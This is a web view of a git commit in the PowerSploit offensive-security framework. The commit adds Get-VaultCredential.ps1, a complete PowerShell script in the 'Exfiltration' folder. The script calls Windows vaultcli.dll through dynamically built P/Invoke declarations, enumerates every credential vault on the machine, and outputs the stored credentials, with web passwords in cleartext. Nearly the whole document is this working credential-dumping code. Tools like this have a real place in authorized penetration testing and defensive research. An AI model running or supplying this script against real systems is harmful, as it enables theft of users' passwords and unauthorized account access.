aboutsummaryrefslogtreecommitdiff
path: root/Exfiltration/Get-VaultCredential.ps1
diff options
context:
space:
mode:
authorMatt Graeber <PowerShellMafia@users.noreply.github.com>2015-11-04 13:41:36 -0500
committerMatt Graeber <PowerShellMafia@users.noreply.github.com>2015-11-04 13:41:36 -0500
commit2dd1f5920d08d877628154bcbe8c2a93f2b835af (patch)
treefc68c81f32a44c893a16849baab858ef1667c7c9 /Exfiltration/Get-VaultCredential.ps1
parent5a812ce82361bf65443fc9c545c091e21e98fe80 (diff)
downloadPowerSploit-2dd1f5920d08d877628154bcbe8c2a93f2b835af.tar.gz
PowerSploit-2dd1f5920d08d877628154bcbe8c2a93f2b835af.zip
Revert "Normalizing all files to ascii encoding"
This reverts commit 5a812ce82361bf65443fc9c545c091e21e98fe80.
Diffstat (limited to 'Exfiltration/Get-VaultCredential.ps1')
-rw-r--r--Exfiltration/Get-VaultCredential.ps1401
1 files changed, 401 insertions, 0 deletions
diff --git a/Exfiltration/Get-VaultCredential.ps1 b/Exfiltration/Get-VaultCredential.ps1
index e69de29..c830fa2 100644
--- a/Exfiltration/Get-VaultCredential.ps1
+++ b/Exfiltration/Get-VaultCredential.ps1
@@ -0,0 +1,401 @@
+function Get-VaultCredential
+{
+<#
+.SYNOPSIS
+
+Displays Windows vault credential objects including cleartext web credentials.
+
+PowerSploit Function: Get-VaultCredential
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+.DESCRIPTION
+
+Get-VaultCredential enumerates and displays all credentials stored in the Windows
+vault. Web credentials, specifically are displayed in cleartext. This script was
+inspired by the following C implementation: http://www.oxid.it/downloads/vaultdump.txt
+
+.EXAMPLE
+
+Get-VaultCredential
+
+.NOTES
+
+Only web credentials can be displayed in cleartext.
+#>
+ [CmdletBinding()] Param()
+
+ $OSVersion = [Environment]::OSVersion.Version
+ $OSMajor = $OSVersion.Major
+ $OSMinor = $OSVersion.Minor
+
+ #region P/Invoke declarations for vaultcli.dll
+ $DynAssembly = New-Object System.Reflection.AssemblyName('VaultUtil')
+ $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
+ $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('VaultUtil', $False)
+
+ $EnumBuilder = $ModuleBuilder.DefineEnum('VaultLib.VAULT_ELEMENT_TYPE', 'Public', [Int32])
+ $null = $EnumBuilder.DefineLiteral('Undefined', -1)
+ $null = $EnumBuilder.DefineLiteral('Boolean', 0)
+ $null = $EnumBuilder.DefineLiteral('Short', 1)
+ $null = $EnumBuilder.DefineLiteral('UnsignedShort', 2)
+ $null = $EnumBuilder.DefineLiteral('Int', 3)
+ $null = $EnumBuilder.DefineLiteral('UnsignedInt', 4)
+ $null = $EnumBuilder.DefineLiteral('Double', 5)
+ $null = $EnumBuilder.DefineLiteral('Guid', 6)
+ $null = $EnumBuilder.DefineLiteral('String', 7)
+ $null = $EnumBuilder.DefineLiteral('ByteArray', 8)
+ $null = $EnumBuilder.DefineLiteral('TimeStamp', 9)
+ $null = $EnumBuilder.DefineLiteral('ProtectedArray', 10)
+ $null = $EnumBuilder.DefineLiteral('Attribute', 11)
+ $null = $EnumBuilder.DefineLiteral('Sid', 12)
+ $null = $EnumBuilder.DefineLiteral('Last', 13)
+ $VAULT_ELEMENT_TYPE = $EnumBuilder.CreateType()
+
+ $EnumBuilder = $ModuleBuilder.DefineEnum('VaultLib.VAULT_SCHEMA_ELEMENT_ID', 'Public', [Int32])
+ $null = $EnumBuilder.DefineLiteral('Illegal', 0)
+ $null = $EnumBuilder.DefineLiteral('Resource', 1)
+ $null = $EnumBuilder.DefineLiteral('Identity', 2)
+ $null = $EnumBuilder.DefineLiteral('Authenticator', 3)
+ $null = $EnumBuilder.DefineLiteral('Tag', 4)
+ $null = $EnumBuilder.DefineLiteral('PackageSid', 5)
+ $null = $EnumBuilder.DefineLiteral('AppStart', 100)
+ $null = $EnumBuilder.DefineLiteral('AppEnd', 10000)
+ $VAULT_SCHEMA_ELEMENT_ID = $EnumBuilder.CreateType()
+
+ $LayoutConstructor = [Runtime.InteropServices.StructLayoutAttribute].GetConstructor([Runtime.InteropServices.LayoutKind])
+ $CharsetField = [Runtime.InteropServices.StructLayoutAttribute].GetField('CharSet')
+ $StructLayoutCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($LayoutConstructor,
+ @([Runtime.InteropServices.LayoutKind]::Explicit),
+ $CharsetField,
+ @([Runtime.InteropServices.CharSet]::Ansi))
+ $StructAttributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
+
+ $TypeBuilder = $ModuleBuilder.DefineType('VaultLib.VAULT_ITEM', $StructAttributes, [Object], [System.Reflection.Emit.PackingSize]::Size4)
+ $null = $TypeBuilder.DefineField('SchemaId', [Guid], 'Public')
+ $null = $TypeBuilder.DefineField('pszCredentialFriendlyName', [IntPtr], 'Public')
+ $null = $TypeBuilder.DefineField('pResourceElement', [IntPtr], 'Public')
+ $null = $TypeBuilder.DefineField('pIdentityElement', [IntPtr], 'Public')
+ $null = $TypeBuilder.DefineField('pAuthenticatorElement', [IntPtr], 'Public')
+ if ($OSMajor -ge 6 -and $OSMinor -ge 2)
+ {
+ $null = $TypeBuilder.DefineField('pPackageSid', [IntPtr], 'Public')
+ }
+ $null = $TypeBuilder.DefineField('LastModified', [UInt64], 'Public')
+ $null = $TypeBuilder.DefineField('dwFlags', [UInt32], 'Public')
+ $null = $TypeBuilder.DefineField('dwPropertiesCount', [UInt32], 'Public')
+ $null = $TypeBuilder.DefineField('pPropertyElements', [IntPtr], 'Public')
+ $VAULT_ITEM = $TypeBuilder.CreateType()
+
+ $TypeBuilder = $ModuleBuilder.DefineType('VaultLib.VAULT_ITEM_ELEMENT', $StructAttributes)
+ $TypeBuilder.SetCustomAttribute($StructLayoutCustomAttribute)
+ $null = $TypeBuilder.DefineField('SchemaElementId', $VAULT_SCHEMA_ELEMENT_ID, 'Public').SetOffset(0)
+ $null = $TypeBuilder.DefineField('Type', $VAULT_ELEMENT_TYPE, 'Public').SetOffset(8)
+ $VAULT_ITEM_ELEMENT = $TypeBuilder.CreateType()
+
+
+ $TypeBuilder = $ModuleBuilder.DefineType('VaultLib.Vaultcli', 'Public, Class')
+ $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultOpenVault',
+ 'vaultcli.dll',
+ 'Public, Static',
+ [Reflection.CallingConventions]::Standard,
+ [Int32],
+ [Type[]] @([Guid].MakeByRefType(),
+ [UInt32],
+ [IntPtr].MakeByRefType()),
+ [Runtime.InteropServices.CallingConvention]::Winapi,
+ [Runtime.InteropServices.CharSet]::Auto)
+
+ $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultCloseVault',
+ 'vaultcli.dll',
+ 'Public, Static',
+ [Reflection.CallingConventions]::Standard,
+ [Int32],
+ [Type[]] @([IntPtr].MakeByRefType()),
+ [Runtime.InteropServices.CallingConvention]::Winapi,
+ [Runtime.InteropServices.CharSet]::Auto)
+
+ $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultFree',
+ 'vaultcli.dll',
+ 'Public, Static',
+ [Reflection.CallingConventions]::Standard,
+ [Int32],
+ [Type[]] @([IntPtr]),
+ [Runtime.InteropServices.CallingConvention]::Winapi,
+ [Runtime.InteropServices.CharSet]::Auto)
+
+ $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultEnumerateVaults',
+ 'vaultcli.dll',
+ 'Public, Static',
+ [Reflection.CallingConventions]::Standard,
+ [Int32],
+ [Type[]] @([Int32],
+ [Int32].MakeByRefType(),
+ [IntPtr].MakeByRefType()),
+ [Runtime.InteropServices.CallingConvention]::Winapi,
+ [Runtime.InteropServices.CharSet]::Auto)
+
+ $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultEnumerateItems',
+ 'vaultcli.dll',
+ 'Public, Static',
+ [Reflection.CallingConventions]::Standard,
+ [Int32],
+ [Type[]] @([IntPtr],
+ [Int32],
+ [Int32].MakeByRefType(),
+ [IntPtr].MakeByRefType()),
+ [Runtime.InteropServices.CallingConvention]::Winapi,
+ [Runtime.InteropServices.CharSet]::Auto)
+
+ if ($OSMajor -ge 6 -and $OSMinor -ge 2)
+ {
+ $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultGetItem',
+ 'vaultcli.dll',
+ 'Public, Static',
+ [Reflection.CallingConventions]::Standard,
+ [Int32],
+ [Type[]] @([IntPtr],
+ [Guid].MakeByRefType(),
+ [IntPtr],
+ [IntPtr],
+ [IntPtr],
+ [IntPtr],
+ [Int32],
+ [IntPtr].MakeByRefType()),
+ [Runtime.InteropServices.CallingConvention]::Winapi,
+ [Runtime.InteropServices.CharSet]::Auto)
+ }
+ else
+ {
+ $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultGetItem',
+ 'vaultcli.dll',
+ 'Public, Static',
+ [Reflection.CallingConventions]::Standard,
+ [Int32],
+ [Type[]] @([IntPtr],
+ [Guid].MakeByRefType(),
+ [IntPtr],
+ [IntPtr],
+ [IntPtr],
+ [Int32],
+ [IntPtr].MakeByRefType()),
+ [Runtime.InteropServices.CallingConvention]::Winapi,
+ [Runtime.InteropServices.CharSet]::Auto)
+ }
+
+ $Vaultcli = $TypeBuilder.CreateType()
+ #endregion
+
+ # Helper function to extract the ItemValue field from a VAULT_ITEM_ELEMENT struct.
+ function local:Get-VaultElementValue
+ {
+ Param (
+ [ValidateScript({$_ -ne [IntPtr]::Zero})]
+ [IntPtr]
+ $VaultElementPtr
+ )
+
+ $PartialElement = [Runtime.InteropServices.Marshal]::PtrToStructure($VaultElementPtr, [Type] $VAULT_ITEM_ELEMENT)
+ $ElementPtr = [IntPtr] ($VaultElementPtr.ToInt64() + 16)
+
+ switch ($PartialElement.Type)
+ {
+ $VAULT_ELEMENT_TYPE::String {
+ $StringPtr = [Runtime.InteropServices.Marshal]::ReadIntPtr([IntPtr] $ElementPtr)
+ [Runtime.InteropServices.Marshal]::PtrToStringUni([IntPtr] $StringPtr)
+ }
+
+ $VAULT_ELEMENT_TYPE::Boolean {
+ [Bool] [Runtime.InteropServices.Marshal]::ReadByte([IntPtr] $ElementPtr)
+ }
+
+ $VAULT_ELEMENT_TYPE::Short {
+ [Runtime.InteropServices.Marshal]::ReadInt16([IntPtr] $ElementPtr)
+ }
+
+ $VAULT_ELEMENT_TYPE::UnsignedShort {
+ [Runtime.InteropServices.Marshal]::ReadInt16([IntPtr] $ElementPtr)
+ }
+
+ $VAULT_ELEMENT_TYPE::Int {
+ [Runtime.InteropServices.Marshal]::ReadInt32([IntPtr] $ElementPtr)
+ }
+
+ $VAULT_ELEMENT_TYPE::UnsignedInt {
+ [Runtime.InteropServices.Marshal]::ReadInt32([IntPtr] $ElementPtr)
+ }
+
+ $VAULT_ELEMENT_TYPE::Double {
+ [Runtime.InteropServices.Marshal]::PtrToStructure($ElementPtr, [Type] [Double])
+ }
+
+ $VAULT_ELEMENT_TYPE::Guid {
+ [Runtime.InteropServices.Marshal]::PtrToStructure($ElementPtr, [Type] [Guid])
+ }
+
+ $VAULT_ELEMENT_TYPE::Sid {
+ $SidPtr = [Runtime.InteropServices.Marshal]::ReadIntPtr([IntPtr] $ElementPtr)
+ Write-Verbose "0x$($SidPtr.ToString('X8'))"
+ $SidObject = [Security.Principal.SecurityIdentifier] ([IntPtr] $SidPtr)
+ $SidObject.Value
+ }
+
+ # These elements are currently unimplemented.
+ # I have yet to see these used in practice.
+ $VAULT_ELEMENT_TYPE::ByteArray { $null }
+ $VAULT_ELEMENT_TYPE::TimeStamp { $null }
+ $VAULT_ELEMENT_TYPE::ProtectedArray { $null }
+ $VAULT_ELEMENT_TYPE::Attribute { $null }
+ $VAULT_ELEMENT_TYPE::Last { $null }
+ }
+ }
+
+ $VaultCount = 0
+ $VaultGuidPtr = [IntPtr]::Zero
+ $Result = $Vaultcli::VaultEnumerateVaults(0, [Ref] $VaultCount, [Ref] $VaultGuidPtr)
+
+ if ($Result -ne 0)
+ {
+ throw "Unable to enumerate vaults. Error (0x$($Result.ToString('X8')))"
+ }
+
+ $GuidAddress = $VaultGuidPtr
+
+ $VaultSchema = @{
+ ([Guid] '2F1A6504-0641-44CF-8BB5-3612D865F2E5') = 'Windows Secure Note'
+ ([Guid] '3CCD5499-87A8-4B10-A215-608888DD3B55') = 'Windows Web Password Credential'
+ ([Guid] '154E23D0-C644-4E6F-8CE6-5069272F999F') = 'Windows Credential Picker Protector'
+ ([Guid] '4BF4C442-9B8A-41A0-B380-DD4A704DDB28') = 'Web Credentials'
+ ([Guid] '77BC582B-F0A6-4E15-4E80-61736B6F3B29') = 'Windows Credentials'
+ ([Guid] 'E69D7838-91B5-4FC9-89D5-230D4D4CC2BC') = 'Windows Domain Certificate Credential'
+ ([Guid] '3E0E35BE-1B77-43E7-B873-AED901B6275B') = 'Windows Domain Password Credential'
+ ([Guid] '3C886FF3-2669-4AA2-A8FB-3F6759A77548') = 'Windows Extended Credential'
+ ([Guid] '00000000-0000-0000-0000-000000000000') = $null
+ }
+
+ if ($VaultCount)
+ {
+ foreach ($i in 1..$VaultCount)
+ {
+ $VaultGuid = [Runtime.InteropServices.Marshal]::PtrToStructure($GuidAddress, [Type] [Guid])
+ $GuidAddress = [IntPtr] ($GuidAddress.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] [Guid]))
+
+ $VaultHandle = [IntPtr]::Zero
+
+ Write-Verbose "Opening vault - $($VaultSchema[$VaultGuid]) ($($VaultGuid))"
+
+ $Result = $Vaultcli::VaultOpenVault([Ref] $VaultGuid, 0, [Ref] $VaultHandle)
+
+ if ($Result -ne 0)
+ {
+ Write-Error "Unable to open the following vault: $($VaultSchema[$VaultGuid]). Error (0x$($Result.ToString('X8')))"
+ continue
+ }
+
+ $VaultItemCount = 0
+ $VaultItemPtr = [IntPtr]::Zero
+
+ $Result = $Vaultcli::VaultEnumerateItems($VaultHandle, 512, [Ref] $VaultItemCount, [Ref] $VaultItemPtr)
+
+ if ($Result -ne 0)
+ {
+ $null = $Vaultcli::VaultCloseVault([Ref] $VaultHandle)
+ Write-Error "Unable to enumerate vault items from the following vault: $($VaultSchema[$VaultGuid]). Error (0x$($Result.ToString('X8')))"
+ continue
+ }
+
+ $StructAddress = $VaultItemPtr
+
+ if ($VaultItemCount)
+ {
+ foreach ($j in 1..$VaultItemCount)
+ {
+ $CurrentItem = [Runtime.InteropServices.Marshal]::PtrToStructure($StructAddress, [Type] $VAULT_ITEM)
+ $StructAddress = [IntPtr] ($StructAddress.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] $VAULT_ITEM))
+
+ $PasswordVaultItem = [IntPtr]::Zero
+
+ if ($OSMajor -ge 6 -and $OSMinor -ge 2)
+ {
+ $Result = $Vaultcli::VaultGetItem($VaultHandle,
+ [Ref] $CurrentItem.SchemaId,
+ $CurrentItem.pResourceElement,
+ $CurrentItem.pIdentityElement,
+ $CurrentItem.pPackageSid,
+ [IntPtr]::Zero,
+ 0,
+ [Ref] $PasswordVaultItem)
+ }
+ else
+ {
+ $Result = $Vaultcli::VaultGetItem($VaultHandle,
+ [Ref] $CurrentItem.SchemaId,
+ $CurrentItem.pResourceElement,
+ $CurrentItem.pIdentityElement,
+ [IntPtr]::Zero,
+ 0,
+ [Ref] $PasswordVaultItem)
+ }
+
+ $PasswordItem = $null
+
+ if ($Result -ne 0)
+ {
+ Write-Error "Error occured retrieving vault item. Error (0x$($Result.ToString('X8')))"
+ continue
+ }
+ else
+ {
+ $PasswordItem = [Runtime.InteropServices.Marshal]::PtrToStructure($PasswordVaultItem, [Type] $VAULT_ITEM)
+ }
+
+ if ($VaultSchema.ContainsKey($VaultGuid))
+ {
+ $VaultType = $VaultSchema[$VaultGuid]
+ }
+ else
+ {
+ $VaultType = $VaultGuid
+ }
+
+ if ($PasswordItem.pAuthenticatorElement -ne [IntPtr]::Zero)
+ {
+ $Credential = Get-VaultElementValue $PasswordItem.pAuthenticatorElement
+ }
+ else
+ {
+ $Credential = $null
+ }
+
+ $PackageSid = $null
+
+ if ($CurrentItem.pPackageSid -and ($CurrentItem.pPackageSid -ne [IntPtr]::Zero))
+ {
+ $PackageSid = Get-VaultElementValue $CurrentItem.pPackageSid
+ }
+
+
+ $Properties = @{
+ Vault = $VaultType
+ Resource = if ($CurrentItem.pResourceElement) { Get-VaultElementValue $CurrentItem.pResourceElement } else { $null }
+ Identity = if ($CurrentItem.pIdentityElement) { Get-VaultElementValue $CurrentItem.pIdentityElement } else { $null }
+ PackageSid = $PackageSid
+ Credential = $Credential
+ LastModified = [DateTime]::FromFileTimeUtc($CurrentItem.LastModified)
+ }
+
+ $VaultItem = New-Object PSObject -Property $Properties
+ $VaultItem.PSObject.TypeNames[0] = 'VAULTCLI.VAULTITEM'
+
+ $VaultItem
+
+ $null = $Vaultcli::VaultFree($PasswordVaultItem)
+ }
+ }
+
+ $null = $Vaultcli::VaultCloseVault([Ref] $VaultHandle)
+ }
+ }
+} \ No newline at end of file
generated by cgit v1.2.3 (git 2.39.1) at 2025-10-30 15:59:47 +0000